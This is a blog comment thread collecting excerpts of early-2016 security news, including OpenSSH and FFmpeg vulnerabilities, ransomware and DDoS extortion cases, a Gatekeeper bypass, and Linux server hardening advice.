Security trends for 2016

2,232 Comments

1. January 15, 2016 at 10:16 am

   Tomi Engdahl says:

   Bug that can leak crypto keys just fixed in widely used OpenSSH
   Vulnerability allows malicious servers to read memory on connecting computers.
   http://arstechnica.com/security/2016/01/bug-that-can-leak-crypto-keys-just-fixed-in-widely-used-openssh/

   A critical bug that can leak secret cryptographic keys has just just been fixed in OpenSSH, one of the more widely used implementations of the secure shell (SSH) protocol.

   The vulnerability resides only in the version end users use to connect to servers and not in versions used by servers. A maliciously configured server could exploit it to obtain the contents of the connecting computer’s memory, including the private encryption key used for SSH connections. The bug is the result of code that enables an experimental roaming feature in OpenSSH versions 5.4 to 7.1

   “The matching server code has never been shipped, but the client code was enabled by default and could be tricked by a malicious server into leaking client memory to the server, including private client user keys,” OpenSSH officials wrote in an advisory published Thursday. “The authentication of the server host key prevents exploitation by a man-in-the-middle, so this information leak is restricted to connections to malicious or compromised servers.”

   The advisory said that anyone using a vulnerable version should update right away. Those who are unable to update should disable roaming by adding the string UseRoaming no to the global ssh_config(5) file or to the user configuration

   More: http://www.epanorama.net/newepa/2016/01/15/openssh-client-bugs-cve-2016-0777-and-cve-2016-0778/

   Reply
2. January 15, 2016 at 10:19 am

   Tomi Engdahl says:

   Zero-Day Vulnerability Discovered In FFmpeg Lets Attackers Steal Files Remotely
   http://it.slashdot.org/story/16/01/14/2214244/zero-day-vulnerability-discovered-in-ffmpeg-lets-attackers-steal-files-remotely

   A zero-day vulnerability in the FFmpeg open-source multimedia framework, which is currently used in numerous Linux kernel-based operating systems and software applications, also for the Mac OS X and Windows platforms, has been discovered

   Zero-Day FFmpeg Vulnerability Lets Anyone Steal Files from Remote Machines
   http://news.softpedia.com/news/zero-day-ffmpeg-vulnerability-lets-anyone-steal-files-from-remote-machines-498880.shtml

   A zero-day vulnerability in the FFmpeg open-source multimedia framework, which is currently used in numerous Linux kernel-based operating systems and software applications, also for the Mac OS X and Windows platforms, was unveiled recently.

   The vulnerability was discovered on January 12, 2016, by Russian programmer Maxim Andreev in the current stable builds of the FFmpeg software, and it would appear that it allows anyone who has the necessary skills to hack a computer to read local files on a remote machine and send them over the network using a specially crafted video file.

   The vulnerability is limited to reading local files and sending them over the network, not to remote code execution, but it’s enough to do some damage. The FFmpeg developers are aware of the issue, and they are trying to patch it as we speak. James Darnley of FFmpeg suggests that disabling HLS (HTTP Live Streaming) while building the package should do the trick until a fix is committed.

   “ffmpeg has a vulnerability in the current version that allows the attacker to create a specially crafted video file, downloading which will send files from a user PC to a remote attacker server. The attack does not even require the user to open that file – for example, KDE Dolphin thumbnail generation is enough”

   Already patched in Arch Linux

   We’ve been informed earlier today, January 13, 2016, that Arch Linux developers have already patched the FFmpeg 2.8.4 packages in the operating system by rebuilding them without the AppleHTTP and HLS demuxers.

   Reply
3. January 15, 2016 at 10:21 am

   Tomi Engdahl says:

   “DDoS-For-Bitcoin” Blackmailers Arrested
   http://yro.slashdot.org/story/16/01/15/0210222/ddos-for-bitcoin-blackmailers-arrested

   The DDoSing outfit that spawned the trend of “DDoS-for-Bitcoin” has been arrested by Europol in Bosnia Herzegovina last month. DD4BC first appeared in September 2015, when Akamai blew the lid on their activities

   Members of DD4BC, the Group That Blackmailed Companies with DDoS Attacks, Arrested by Europol
   http://news.softpedia.com/news/members-of-dd4bc-the-group-that-blackmailed-companies-with-ddos-attacks-arrested-by-europol-498797.shtml

   Europol has announced the arrest of key members of the DD4BC hacking outfit that blackmailed multiple European companies with DDoS attacks in exchange for Bitcoin payments.

   Austrian authorities started the investigation after several local companies reported blackmail attempts. Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT) soon joined the operation, and a continent-wide hunt started, with law enforcement agencies in multiple countries looking for clues that might help them discover DD4BC’s whereabouts.

   UK’s Metropolitan Police Cyber Crime Unit (MPCCU) was the one that tracked down the group, identifying key members in Bosnia and Herzegovina.

   The activities of the DD4BC group were first detailed by Akamai at the start of September 2015, but their first attacks were recorded as early as September 2014.

   The group operated by launching small DDoS attacks against companies and then asked for a ransom in Bitcoin to prevent further assaults. If the victim declined to pay, the group would then launch more powerful attacks in the following days. This went on until the hackers got paid or bored.

   Ever since Akamai published their report on the group’s modus operandi, DD4BC went dormant.

   Reply
4. January 15, 2016 at 1:56 pm

   Tomi Engdahl says:

   Stonesoft will merge into the Yankee master

   American arms manufacturers Raytheon bought Finnish network security company Stonesoft from Intel.

   Raytheon have been told to form a security shareholdings about the new company it is forming:
   New Forcepoint company will consist of Raytheon Cyber ​​Products, Websense and Stonesoft.
   Raytheon’s goal is to provide customers with security products on a large scale as the Internet, e-mail and terminals, as well as products for protection, firewalls, and data analytics.
   Raytheon’s long history of cooperation with the US Department of Defense says its broad capabilities, which can be utilized in the private sector.

   Force Point’s product director Mike Siegel, the new company will be the strength of its cloud-based system that distributes data among different tools and produce an analysis of reports from security threats.

   Force Point has a beginning around 2200 employees in 44 locations worldwide.

   Source: http://www.tivi.fi/Kaikki_uutiset/stonesoft-sulautuu-jenkki-isantaansa-6245381

   Reply
5. January 15, 2016 at 2:33 pm

   Tomi Engdahl says:

   Securing a wireless application
   http://www.controleng.com/single-article/securing-a-wireless-application/3b6559f5017e8773396d0cba486163e7.htm

   Industrial wireless applications are being used by leading manufacturers and operators to improve availability and reduce costs, and there are plenty of protection techniques such as defense-in-depth to keep a network from being compromised by a security breach.

   Industrial wireless applications are seeing more and more action by leading manufacturers and operators to improve availability and reduce costs. In theory, that sounds great, but it is worth considering how difficult it is to make sure these industrial networks are secure before using them in a facility.

   The good news is the best practices, technologies, and products currently available make implementing wireless applications securely straightforward for engineering teams. Wireless applications are no different than wired applications when it comes to an essential industrial control system (ICS) security best practice-defense-in-depth (DiD). DiD is a holistic approach built on three core concepts:

   1. Multiple layers of defense: A variety of security solutions end up used so if an attacker bypasses one area, another can provide the needed defense.
   2. Differentiated layers of defense: Each security layer is slightly different so an attacker can′t automatically get through all layers of defense.
   3. Threat-specific layers of defense: Each defense is for the specific context and threat, allowing protection based on the behavior and context of the systems using these protocols.

   Whether a threat is an accidental internal incident or a deliberate external attack, a DiD approach will detect, isolate, and control it. The wireless defense strategies outlined work together to provide the layers of protection needed to make sure the user’s wireless local area network (WLAN) is secure.

   Protection technique #1

   A challenge with WLAN transmission paths is they can broadcast outside a company’s property boundaries.

   Industry cooperation has led to standards such as IEEE 802.11i/WPA2 that protect the confidentiality and integrity of wireless data. All current products on the market must comply with these standards, ensuring control system communications are authentic, and attackers cannot extract sensitive data.

   In regard to WPA2, be sure to implement its Enterprise mode for strong device authentication. Unlike personal networks, WPA2 (Enterprise mode) provides different keys for different devices, with the keys managed in a central database such as RADIUS. Lost or stolen devices can be disconnected from the network simply by removing their information from the database.

   Furthermore, with WPA2 (Enterprise mode), individual devices can be assigned to different virtual LANs (VLANs) so devices with different roles can be clearly differentiated.

   Protection technique #2

   Another aspect of wireless communications you want to protect are management frames

   Protected management frames (PMF) are useful because they are designed to protect against forgery by extending the mechanism for authentication and encryption present in WPA2 to management frames. By using products with the PMF capability, it is impossible for misused management functions to attack a network.

   Protection technique #3

   Even the most effective WLAN encryption doesn’t offer protection when a security incident originates inside the network. But, by selectively limiting communication to only what is required to run the industrial application, additional barriers are established that are designed to limit the impact of internal attacks.

   This type of limitation is another defense-in-depth mechanism that considerably increases the all-around security of a network. Other strategies for limiting communication within the network include:

   Protect WLAN data by implementing a configurable Layer 2 firewall at the Ethernet level. To do this you need to make sure you are using Access Points with a built-in Layer 2 firewall. The best ones can filter routed and bridged traffic as well as packet-filter traffic between WLAN clients.
   Apply stateful deep-packet inspection (DPI) to secure protocols. After the Layer 2 firewall rules are applied, the DPI firewall inspects the content of the contained messages and applies more detailed rules. For example, a Modbus DPI firewall can determine if the Modbus message is a read or a write message and then drop all write messages. Good DPI firewalls can also “sanity check” traffic for strangely formatted messages or unusual behaviors.

   DPI firewalls are often used to protect zones of equipment with similar security requirements as per ISA IEC 62443 or to protect equipment critical to the process. Be aware that DPI is sometimes known by other terms, such as content inspection or protocol whitelisting, and it is not a widely available capability.

   Reply
6. January 15, 2016 at 2:43 pm

   Tomi Engdahl says:

   In a world where 90% of devices store personal information and the majority of connected devices don’t have sufficient security, the Internet of Things requires more than an attack dog.

   Source: http://www.eetimes.com/document.asp?doc_id=1328631&page_number=8

   Reply
7. January 15, 2016 at 2:51 pm

   Tomi Engdahl says:

   Finnish Communications Regulatory Authority Kyberturvallisuuskeskus warns in a statement that in Finland the popular content management systems WordPress and Joomla are attractive targets for malware disseminating network to attack.

   Publication systems are confronted with attacks carried out auutomatisoiduilla tools continuously. Vulnerable publishing system when it finds a network attackers will increase the site malicious redirection, which can lead to contamination of the device to be used. Cybercriminals often use Cryptowallin-like extortion malware.

   Harmful control is a WordPress platform is often added to the file wp-includes / nav-menu.php and Joomla platform file includes / defines.php. In addition to these cyber criminals will leave the back door of one or more of the various file server.

   Sources:
   http://www.tivi.fi/Kaikki_uutiset/viestintavirasto-varoittaa-nama-julkaisujarjestelmat-jatkuvasti-verkkohyokkaysten-kohteena-6240224
   https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/12/ttn201512161547.html

   Reply
8. January 15, 2016 at 3:15 pm

   Tomi Engdahl says:

   Mobile phone security unified

   Nordic communications authorities have issued their first joint mobile networks to improve the safety recommendation. The Recommendation aims to raise part of the security already obsolete implementation.

   Nordic communications authorities aim to bring mobile communications and integrated network security levels in all the Nordic countries. Especially since in recent years has raised a number of mobile telephony SS7 signaling traffic potential for abuse.

   Signalling transport function is to enable, inter alia, forwarding calls and other messages to the telecommunications operator’s own network, as well as within and between different telecom operators networks.

   Use of the telephone network, the many technical solutions were designed in the 1970s and 80s, so safety deficiencies due to the long life cycle. Irregularity Opportunities originally related to a closed network between telecom companies trust-based approach to exploitation.

   Nordic communications authorities have now, telecommunications companies through a joint recommendation for a first-time whose purpose is to prevent the SS7 signaling traffic abuse potential

   Source: http://www.uusiteknologia.fi/2016/01/15/kannykoiden-tietoturvaa-yhtenaistetaan/

   Reply
9. January 15, 2016 at 3:29 pm

   Tomi Engdahl says:

   Shoddy Ransomware Destroys User’s Files
   http://news.softpedia.com/news/shoddy-ransomware-destroys-the-user-s-files-498889.shtml

   A ransomware strain based on the open source Hidden Tear ransomware is infecting users, encrypting their files and losing the encryption key along the way, rendering all files unrecoverable.

   Last August, Turkish security researcher Utku Sen open-sourced on GitHub the code of a home-made ransomware they’ve created for educational purposes.

   This particular ransomware was named Hidden Tear, and according to its author’s blog post, it was a honeypot to fool ransomware authors into using his code instead of creating their own.

   The trick was that Hidden Tear contained a crypto flaw that would allow the researcher to decrypt files later on if someone ever used his code.

   According to Trend Micro’s security team, someone did, and those were the creators of the ransomware strain identified by the company as RANSOM_CRYPTEAR.B.

   Between September 15 and December 17, this group hijacked a website from Paraguay, and used it to redirect its users to a fake Adobe Flash look-a-like website that spread a booby-trapped Flash Player update.

   Users that downloaded this update would see the file launch into execution as soon as it finished downloading, and in a matter of minutes they would be infected with a crypto-ransomware that encrypted most of their data files.

   RANSOM_CRYPTEAR.B was losing the encryption key

   The bad part was that the ransomware’s authors somehow managed to muddle Hidden Tear’s code, and they were throwing away the encryption key, never sending it to their C&C servers.

   This shoddy behavior didn’t matter for the ransomware’s authors, who were more interested in receiving the Bitcoin payment (around $500) than in providing a safe way to decrypt encrypted files after the ransom was received.

   Destroying The Encryption of Hidden Tear Ransomware
   http://www.utkusen.com/blog/destroying-the-encryption-of-hidden-tear-ransomware.html

   Reply
10. January 15, 2016 at 3:50 pm

    Tomi Engdahl says:

    It seems that Bitcoin is broken:

    Big Trouble for Bitcoin
    http://news.slashdot.org/story/16/01/15/1310214/big-trouble-for-bitcoin

    A blog post by ex-Bitcoin developer Mike Hearn has highlighted dysfunctional management right at the top of Bitcoin development. He says it is clear Bitcoin is on the verge of collapse, and lays out several compelling reasons why. Quoting: “What was meant to be a new, decentralized form of money that lacked ‘systemically important institutions’ and ‘too big to fail’ has become something even worse: a system completely controlled by just a handful of people. Worse still, the network is on the brink of technical collapse.”

    The resolution of the Bitcoin experiment
    https://medium.com/@octskyward/the-resolution-of-the-bitcoin-experiment-dabb30201f7#.3f9qnqoi6

    Reply
11. January 15, 2016 at 3:52 pm

    Tomi Engdahl says:

    IBM buys fraud sniffing biz for real-time protection
    This will help in ‘dramatically lowering false positives’, says Big Blue
    http://www.theregister.co.uk/2016/01/15/ibm_slurps_up_fraud_detection_biz_for_realtime_protection/

    IBM has assimilated a German payment fraud prevention business, IRIS Analytics, a provider of a real-time fraud analytics engine using machine learning algorithms, for undisclosed terms.

    “By integrating IRIS Analytics with IBM’s counter fraud technology, we will help organisations more accurately detect fraud at scale and speed so they’re in a position to implement countermeasures quickly,” said Alistair Rennie, general manager of Industry Solutions at IBM, “while at the same time assisting with dramatically lowering false positives.”

    Banks typically detect fraud after the fact, and take on average four days to deploy counter-measures.

    “The combination of IRIS technology with IBM’s Counter Fraud capabilities creates a comprehensive solution for real time payment fraud prevention,”

    Reply
12. January 15, 2016 at 4:04 pm

    Tomi Engdahl says:

    Kiwi hackers crack crap algo, showcase 40c-a-litre DIY fuel discounts
    Half price petrol? There’s an app for that.
    http://www.theregister.co.uk/2016/01/15/kiwi_hackers_crack_crap_algo_showcase_40caliter_diy_fuel_discounts/

    New Zealanders could print their own non-expiring 40c fuel discount vouchers thanks to a shoddy algorithm that a hacking duo has broken.

    The algorithm developed by Countdown affects petrol stations operated by national energy provider Z and is designed as an incentive for consumers who shop at various supermarkets.

    Countdown says it has developed a “technical solution” for barcode reuse, but it is unknown – and appears unlikely – if this shutters the flaw which allows new codes to be generated at will.

    The petrol station had earlier disabled manual barcode entry at pumps to stop codes being shared online, but the researchers say fixing the flaw will require the algorithm to be re-written.

    The two researchers, who requested anonymity, have generated the discount codes on a host of different platforms including an unpublished Android app, a barcode printer, and even on tee-shirts.

    In a demonstration at the Kiwicon security conference last month the pair demonstrated how with the click of a button their smart watch application would produce codes that could be scanned at the pump for discounts up to 40 cents a litre.

    The duo says they have not used the codes on pumps, and urged others to do similar since it would likely be regarded as theft, but say it is identical to the legitimate barcodes offered at retail shops.

    Manipulating the algorithm further such that the output is negative could result in a denial of service attack against the petrol pump computers.

    Reply
13. January 15, 2016 at 4:07 pm

    Tomi Engdahl says:

    BlackBerry dismisses claims that Dutch police cracked its email encryption
    Says devices are as secure as they always have been
    http://www.theinquirer.net/inquirer/news/2441512/dutch-police-claim-to-have-cracked-blackberry-encryption

    CANADIAN PHONE MAKER BlackBerry has dismissed claims that Dutch police managed to ‘crack’ the encryption of emails and data stored on its devices.

    In a statement, the firm said: “If such an information recovery did happen, access to this information from a BlackBerry device could be due to factors unrelated to how the BlackBerry device was designed, such as user consent, an insecure third-party application, or deficient security behaviour or the user,” the firm said in a statement.

    BlackBerry added that it remains focused on privacy and security, and affirmed that there are no backdoors in any of its devices.

    Reply
14. January 15, 2016 at 4:46 pm

    Tomi Engdahl says:

    Server Hardening
    http://www.linuxjournal.com/content/server-hardening

    A truly comprehensive work on server hardening would be beyond the scope not only of a single article, but a single (very large) book, yet all is not lost. It is true that there can be no “one true hardening procedure” due to the many and varied environments, technologies and purposes to which those technologies are put, but it is also true that you can develop a methodology for governing those technologies and the processes that put the technology to use that can guide you toward a sane setup. You can boil down the essentials to a few principles that you then can apply across the board.

    I also should say that server hardening, in itself, is almost a useless endeavor if you are going to undercut yourself with lazy choices like passwords of “abc123″ or lack a holistic approach to security in the environment. Insecure coding practices can mean that the one hole you open is gaping, and users e-mailing passwords can negate all your hard work. The human element is key, and that means fostering security consciousness at all steps of the process. Security that is bolted on instead of baked in will never be as complete or as easy to maintain, but when you don’t have executive support for organizational standards, bolting it on may be the best you can do. You can sleep well though knowing that at least the Linux server for which you are responsible is in fact properly if not exhaustively secured.

    The single most important principle of server hardening is this: minimize your attack surface. The reason is simple and intuitive: a smaller target is harder to hit. Applying this principle across all facets of the server is essential. This begins with installing only the specific packages and software that are exactly necessary for the business purpose of the server and the minimal set of management and maintenance packages. Everything present must be vetted and trusted and maintained. Every line of code that can be run is another potential exploit on your system, and what is not installed can not be used against you. Every distribution and service of which I am aware has an option for a minimal install, and this is always where you should begin.

    The second most important principle is like it: secure that which must be exposed. This likewise spans the environment from physical access to the hardware, to encrypting everything that you can everywhere—at rest on the disk, on the network and everywhere in between. For the physical location of the server, locks, biometrics, access logs—all the tools you can bring to bear to controlling and recording who gains physical access to your server are good things, because physical access, an accessible BIOS and a bootable USB drive are just one combination that can mean that your server might as well have grown legs and walked away with all your data on it. Rogue, hidden wireless SSIDs broadcast from a USB device can exist for some time before being stumbled upon.

    Within the parameters of this example scenario, there are levels of concern that differ depending on the purpose of the server, ranging from “this is a toy I’m playing with, and I don’t care what happens to it” all the way to “governments will topple and masses of people die if this information is leaked”, and although a different level of paranoia and effort needs to be applied in each case, the principles remain the same.

    Even if you don’t care what ultimately happens to the server, you still don’t want it joining a botnet and contributing to Internet Mayhem. If you don’t care, you are bad and you should feel bad.

    In any of these cases, the very first thing to do is tighten your network access. If the hosting provider provides a mechanism for this, like Amazon’s “Zones”, use it, but don’t stop there. Underneath securing what must be exposed is another principle: layers within layers containing hurdle after hurdle. Increase the effort required to reach the final destination, and you reduce the number that are willing and able to reach it. Zones, or network firewalls, can fail due to bugs, mistakes and who knows what factors that could come into play. Maximizing redundancy and backup systems in the case of failure is a good in itself. All of the most celebrated data thefts have happened when not just some but all of the advice contained in this article was ignored, and if only one hurdle had required some effort to surmount, it is likely that those responsible would have moved on to someone else with lower hanging fruit. Don’t be the lower hanging fruit. You don’t always have to outrun the bear.

    The first principle, that which is not present (installed or running) can not be used against you, requires that you ensure you’ve both closed down and turned off all unnecessary services and ports in all runlevels and made them inaccessible via your server’s firewall, in addition to whatever other firewalling you are doing on the network.

    Every distribution has its tools for managing a firewall

    Once you’ve dealt with updates, you can move on and continue to evaluate your server against the two security principles of 1) minimal attack surface and 2) secure everything that must be exposed. At this point, you are pretty solid on point one. On point two, there is more you can yet do.

    The concept of hurdles requires that you not allow root to log in remotely. Gaining root should be at least a two-part process.

    PermitRootLogin no

    For that matter, root should not be able to log in directly at all. The account should have no password and should be accessible only via sudo—another hurdle to clear.

    If a user doesn’t need to have remote login, don’t allow it, or better said, allow only users that you know need remote access.

    You can set a password policy on your server to require a complex password for any and all users, but I believe it is generally a better idea to bypass crackable passwords altogether and use key-only login, and have the key require a complex passphrase.

    Even with strong encryption in use, in the recent past, many flaws have been found in widely used programs and protocols—get used to turning ciphers on and off in both OpenSSH and OpenSSL.

    Get used to installing, using and tuning a few more security essentials, because these last few steps will make you exponentially more secure.

    The fact of the matter is that even though you’ve locked down your authentication, there still exists the chance, however small, that a configuration mistake or an update is changing/breaking your config, or by blind luck an attacker could find a way into your system, or even that the system came with a backdoor. There are a few things you can do that will further protect you from those risks.

    Speaking of backdoors, everything from phones to the firmware of hard drives has backdoors pre-installed.

    So suffice it to say, I personally do not trust anything sourced from the NSA, and I turn SELinux off because I’m a fan of warrants and the fourth amendment.

    In the spirit of turning off and blocking what isn’t needed, since most of the malicious traffic on the Internet comes from just a few sources, why do you need to give them a shot at cracking your servers? I run a short script that collects various blacklists of exploited servers in botnets, Chinese and Russian CIDR ranges and so on, and creates a blocklist from them, updating once a day.

    It’s possible you don’t want all these blocked. I usually leave tor exit nodes open to enable anonymity, or if you do business in China, you certainly can’t block every IP range coming from there.

    Although there are many more areas to be hardened, since according to principle three we assume all measures will be defeated, I will have to leave things like locking down cron and bash as well as automating standard security configurations across environments for another day.

    want to conclude with one last must-use tool: Fail2ban.

    Fail2ban is available in virtually every distribution’s repositories now, and it has become my go-to. Not only is it an extensible Swiss-army knife of brute-force authentication prevention, it comes with an additional bevy of filters to detect other attempts to do bad things to your system. If you do nothing but install it, run it, keep it updated and turn on its filters for any services you run, especially SSH, you will be far better off than you were otherwise. As for me, I have other higher-level software like WordPress log to auth.log for filtering and banning of malefactors with Fail2ban.

    Reply
15. January 18, 2016 at 9:36 am

    Tomi Engdahl says:

    Patrick Tucker / Defense One:
    Hacking collective Ghost Security Group says ISIS created its own encrypted messaging app

    ISIS Has Built A Secure Messaging App
    http://www.defenseone.com/technology/2016/01/isis-now-has-new-secure-messaging-app/125062/

    Facebook and other big tech companies aren’t the only ones who can create apps for encrypted communication.

    ISIS has a new Android app for exchanging secure messages, joining another app that distributes propaganda and recruiting material, according to a counterterrorism network called the Ghost Security Group.

    Last month, Ghost Security and others, observed ISIS members using private messages on the Telegram app and direct messages on Twitter to send followers to a site (since vanished) to download the Amaq Agency app.

    “The application’s primary purpose is for propaganda distribution. Using the app you are able to follow the most recent news and video clips.” Ghost Security representatives told Defense One. The Amaq Agency has known ties to Islamic State and issued statements in support of the attackers in the recent California shootings before all the details were publicly available. .

    The app joins ISIS’ other known methods of communication to individuals and groups. Among their favorite is Telegram, the a messaging app created by Pavel Durov, a Russian entrepreneur residing in Germany.

    Immediately after the Paris attacks in November, credited to ISIS-affiliated gunmen, Telegram suspended 78 public ISIS-related channels in 12 languages. But Durov has made no promises that private chats could be shut down.

    Here’s what today’s announcement from Ghost Security means if it’s true: even if FBI Director James Comey and others get their wish and providers of end-to-end encrypted communication are forced to put in back doors into their services or face banning, then ISIS would still have the ability to communicate securely, just not as securely as if they were using a service like Telegram or WhatsApp … at least not yet.

    Reply
16. January 18, 2016 at 9:45 am

    Tomi Engdahl says:

    Kevin Roose / Fusion:
    Profile of ComplaintsBureau.com owner Scott Breitenstein, who decided to ban revenge porn on his site after interviews for this piece

    At Home with a Revenge Porn Mogul
    http://fusion.net/video/252712/complaints-bureau-revenge-porn-mogul/

    Scott Breitenstein has been called an “internet terrorist,” “the worst man on the internet,” and worse. His work has left behind an Everest-size pile of broken relationships, destroyed reputations, and ruined lives. He’s been targeted by lawsuits, court orders, vigilante hacker groups, and the Department of Homeland Security, all for his role in one of the internet’s darkest trades: hosting “revenge porn,” nude photos and videos posted online non-consensually, often by disgruntled exes.

    Breitenstein, 45, is the owner of ComplaintsBureau.com, a site that hosts user-submitted grievances of all types. He first encountered the site in 2005, after getting ripped off while trying to buy a flat-screen TV from an e-commerce site. Searching for other people who had been scammed by the same site, he found ComplaintsBureau, where he posted a negative review of the business. A week later, under mysterious circumstances, the TV seller’s site went offline.

    “I thought that was cool,”

    Breitenstein never got his money back, but he did acquire a taste for digital vengeance. He emailed the owner of ComplaintsBureau and asked if he’d be willing to sell the site. The owner agreed

    Breitenstein’s ComplaintsBureau was a bare-bones site, but it had something the Better Business Bureau didn’t have: excellent search engine optimization, which often placed ComplaintsBureau’s posts on the first page of Google results for a given business.

    Customers searching for that business’s website would find a ComplaintsBureau post instead, and would often be scared off before their first purchase.

    “I liked it because it could put the bad guy out of business,” Breitenstein said. “Everybody saw how powerful it was.”

    Their complaints were largely unverifiable, frequently profane and often personal, singling out individual employees by name. Unlike sites like TripAdvisor or Yelp, Breitenstein didn’t allow business owners to respond to the complaints made against them, even if they were false or defamatory.

    These complaints carried real weight

    Predictably, businesses hated ComplaintsBureau

    Several years ago, ComplaintsBureau received a more lurid kind of complaint: a user posted nude photos to the site, of someone the user said was his cheating ex-girlfriend.

    Breitenstein, who operated a small fleet of scummy websites in addition to ComplaintsBureau, was no stranger to cheating allegations. Among his sites were ReportMyEx.com and CheatersRUs.com—both sites where jilted lovers could go to name and shame their exes.

    But those sites allowed only text complaints. Photos were a different thing altogether. And days after the revenge porn post went up on ComplaintsBureau, he noticed that the traffic to the post was dwarfing everything else on the site.

    In the past several years, dozens of states have passed laws making it illegal to post revenge porn. But hosting a revenge porn website is still technically legal, thanks to Section 230 of the Communications Decency Act of 1996, which shields websites from liability for content published by their users. (It’s the same law that protects Facebook from being sued when one of its users posts something obscene or copyrighted.)

    Still, the revenge porn business has gotten harder in recent years, thanks to the work of advocacy groups and the support of large tech companies.

    For Breitenstein, the potential reward of distributing revenge porn was worth the risks.

    Breitenstein also devised a dastardly strategy to extract more money from revenge porn victims. Often, victims who appeared on the site would file copyright claims for their nude photos under the Digital Millennium Copyright Act, hoping to get them taken down. Breitenstein told these victims that if these DMCA takedown notices weren’t followed by the rest of the DMCA complaint process—a lengthy endeavor that can involve registering a work with the U.S. Copyright Office and providing voluminous information about the photos being claimed—he would sue them for $10,900 in “defamation” costs.

    As brazen as the practice of penalizing revenge porn victims for defaming him was, it worked; Breitenstein collected tens of thousands of dollars in settlements from terrified women, who were scared that he would report them to a collection agency if they failed to pay.

    With this revenue model in place, Breitenstein was no longer just a crank with a complaints site. From his home in Dayton, he had become a revenge porn mogul—a successful bottom-feeder in the digital economy.

    Reply
17. January 18, 2016 at 9:47 am

    Tomi Engdahl says:

    Inside BlackBerry:
    BlackBerry dismisses claim that Netherlands Forensic Institute cracked its device encryption, suggesting user error or third-party apps may be involved

    BlackBerry Devices: Secure As They Have Always Been
    http://blogs.blackberry.com/2016/01/blackberry-devices-secure-as-they-have-always-been/

    Reply
18. January 18, 2016 at 11:55 am

    Tomi Engdahl says:

    Researcher Bypasses Apple’s Updated Malware Protection in ’5 Minutes’
    http://motherboard.vice.com/read/researcher-bypasses-apples-updated-malware-protection-in-5-minutes

    Apple’s Mac computers have long been considered safer than their Windows-powered counterparts—so much so that the common belief for a long time was that they couldn’t get viruses or malware. Even Apple adopted that cliche for marketing purposes.

    The reality, however, is slightly different. Trojans have targeted Mac computers for years, and things don’t seem to be improving. In fact, cybercriminals created more malware targeting Macs in 2015 than in the past five years combined, according to one study. Since 2012, Apple has tried to protect users with Gatekeeper, a feature designed to block common threats such as fake antivirus products, infected torrent files, and fake Flash installers—all malicious software that Mac users might download while regularly browsing the internet.

    But it looks like Gatekeeper’s walls aren’t as strong as they should be.

    As it is designed now, Gatekeeper checks apps downloaded from the internet to see if they are digitally signed by either Apple or a developer recognized by Apple. If so, Gatekeeper lets the app run on the machine. If not, Gatekeeper prevents the user from installing and executing the app.

    In September, Wardle showed how it was possible to piggyback on a legitimate app signed by Apple to trick a Mac to run another malicious application or binary—with no valid signature—wrapped inside the legitimate one, effectively bypassing Gatekeeper.

    “[The] patch they released was incredibly weak,” Wardle told Motherboard. “It literally took me five minutes to completely bypass.”

    Reply
19. January 18, 2016 at 12:01 pm

    Tomi Engdahl says:

    More people died taking selfies in India last year than anywhere else in the world
    https://www.washingtonpost.com/news/worldviews/wp/2016/01/14/more-people-die-taking-selfies-in-india-than-anywhere-else-in-the-world/

    India may have a selfie-loving prime minister, Narendra Modi, but Indians in general seem to be bad at selfie safety.

    Of at least 27 “selfie related” deaths around the world last year, about half occurred in India, reports show.

    Last year, no-selfie zones were also established in certain areas

    Reply
20. January 18, 2016 at 12:09 pm

    Tomi Engdahl says:

    Casino Sues Security Firm For Failing To Contain Malware Infection
    http://it.slashdot.org/story/16/01/17/1321230/casino-sues-security-firm-for-failing-to-contain-malware-infection

    US casino chain Affinity Games is suing Trustwave Holdings, a cyber-security vendor that was brought in to investigate a card breach but failed to detect and stop a malware incident on Affinity’s servers, which led to the escalation of a previous card breach. The casino chain noticed the sloppy job a few months later when it hired a penetration testing company to comply with new gaming regulation.

    Casino Sues Security Firm for Failing to Contain Malware Infection
    http://news.softpedia.com/news/casino-sues-security-firm-for-failing-to-contain-malware-infection-499010.shtml

    US casino chain Affinity Games is suing Trustwave Holdings, a cyber-security vendor that was brought in to investigate a card breach but failed to detect and stop a malware incident on Affinity’s servers, which led to the escalation of a previous card breach.

    The whole story starts towards the end of October 2013 when Affinity Games was contacted by law enforcement and notified of fraudulent credit card activity on the bank accounts of numerous victims.

    All those people had Affinity’s gambling service in common, so following this revelation, the casino’s staff started an investigation and on October 24, 2013, concluded that it was the victim of a malware intrusion that allowed a third-party to exfiltrate credit card data from some of its computers.

    Trustwave was hired to investigate and stop a credit card breach

    Affinity hired Trustwave to examine the incident, probe for details and contain the malware threat. In a report submitted at the end of the investigation, on January 13, 2014, Trustwave reassured the casino chain that the incident “has been contained” and that a “backdoor component appears to exist within the code base, but appears to be inert.”

    Trustwave also said that the malware’s author became aware that he was detected, and stopped all activity on October 16, 2013, also removing and deactivating some of the malware’s components.

    Life went on as usual until new rules in the gaming industry forced Affinity casinos to upgrade their servers and carry out a series of penetration tests to comply with new regulation.
    Mandiant was brought in to mop up Trustwave’s mess

    According to Mandiant’s report, the original card breach that occurred between March and October 2013, returned to life without being noticed during Trustwave’s investigation, on December 6, 2013, and continued until April 27, 2014, when Mandiant security experts shut it down.

    Affinity says that Trustwave failed to remove the malware it discovered, failed to find all pieces of the malware, and also failed to identify evidence in some logs it looked at.

    Affinity: Trustwave performed a woefully inadequate investigation

    “Trustwave willfully disregarded further evidence that the breach was likely more widespread than what the firm found through its review of the limited systems it examined,” the lawsuit reads. “Trustwave willfully disregarded other evidence that the breach was more widespread than first believed.”

    Affinity is looking for damages in excess of $100,000 / €92,000.

    Reply
21. January 18, 2016 at 12:20 pm

    Tomi Engdahl says:

    KeysForge will give you printable key blueprints using a photo of a lock
    Smartphone photo of lock keyways enough to produce ready-to-print CAD drawings
    http://www.theregister.co.uk/2016/01/18/keysforge_will_give_you_printable_key_blueprints_using_a_photo_of_a_lock/

    Hackers have been gifted with an online web service that can produce blueprints for 3D printed keys from nothing more than a photograph of a lock.

    The KeysForge application developed by an academic trio drastically simplifies the complexities in developing keys, allowing amateurs to snap a photo of a lock and have the respective key 3D printed.

    University of Colorado infosec assistant professor Eric Wustrow and two colleagues revealed the work at the Chaos Communications Congress in Hamburg last month.

    “We made an automatically generating 3D model program [which] takes a single picture of the keyway (lock) and produces a model in CAS (computer assisted design),” Wustrow says, adding that a smart photo photo will suffice.

    “You can then take that model and print it on a 3D printer or ship it off to Shapeways or whatever.

    keysforge
    https://keysforge.com/

